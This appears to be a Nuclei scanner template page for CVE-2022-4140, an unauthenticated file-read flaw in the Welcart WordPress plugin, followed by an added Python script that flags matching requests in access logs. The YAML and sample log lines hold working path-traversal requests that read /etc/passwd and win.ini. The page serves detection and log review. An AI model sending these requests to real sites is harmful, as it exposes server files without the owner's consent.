WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access
ID: CVE-2022-4140
Severity: high
Author: theamanrawat
Tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne
Description
WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
id: CVE-2022-4140

info:
  name: WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access
  author: theamanrawat
  severity: high
  description: |
    WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can access sensitive files on the server, potentially exposing sensitive information.
  remediation: Fixed in version 2.8.5.
  reference:
    - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7
    - https://wordpress.org/plugins/usc-e-shop/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4140
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-4140
    cwe-id: CWE-552
    epss-score: 0.00932
    epss-percentile: 0.82572
    cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: collne
    product: welcart_e-commerce
    framework: wordpress
  tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd"
      - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204962ba1d2a00af10bb443fdbd2ed90d56582a37c919188b444fc07e954614f66022100abede3fc01709b08ab962f1f71f4d32ca873067460d2ff6fe9a7a6f7c8b4367e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4140.yaml"
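
For the log-review side of the same check, the following is an added example (not part of the template or the Nuclei project) that scans web server access logs for requests to the content-log.php path with a logfile parameter, as in the template's request lines. It assumes the combined log format; the function names, the sample lines and the "suspicious" heuristic (absolute path or `..` segment) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path and parameter are the ones the template requests.
VULN_PATH = "/wp-content/plugins/usc-e-shop/functions/content-log.php"
PARAM = "logfile"

# Assumption: combined log format, ip - - [time] "METHOD target PROTO" status size
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def suspicious_value(value):
    """True when the value is an absolute path or contains a '..' segment."""
    v = unquote(value).replace("\\", "/")  # undo a second layer of encoding
    return (v.startswith("/") or ".." in v.split("/")
            or re.match(r"[A-Za-z]:/", v) is not None)

def scan(lines):
    """Return one finding per request to the endpoint that carries logfile."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # endswith() also covers WordPress installed in a subdirectory.
        if not unquote(url.path).endswith(VULN_PATH):
            continue
        for value in parse_qs(url.query).get(PARAM, []):
            findings.append({"ip": m["ip"], "time": m["ts"], "value": value,
                             "suspicious": suspicious_value(value),
                             "served": m["status"] == "200"})
    return findings

# Constructed sample lines (documentation IP ranges, not real traffic).
P = "/wp-content/plugins/usc-e-shop/"
SAMPLE = [
    f'203.0.113.7 - - [10/Jan/2023:10:00:01 +0000] "GET {P}functions/content-log.php?logfile=/etc/passwd HTTP/1.1" 200 1843 "-" "-"',
    f'203.0.113.7 - - [10/Jan/2023:10:00:02 +0000] "GET /shop{P}functions/content-log.php?logfile=%252FWindows%252Fwin.ini HTTP/1.1" 404 512 "-" "-"',
    f'198.51.100.20 - - [10/Jan/2023:10:05:00 +0000] "GET {P}readme.txt HTTP/1.1" 200 900 "-" "-"',
    f'198.51.100.20 - - [10/Jan/2023:10:06:00 +0000] "GET {P}functions/content-log.php?logfile=usces.log HTTP/1.1" 200 120 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with both `suspicious` and `served` set is the combination to triage first, since the template itself only matches on a 200 response.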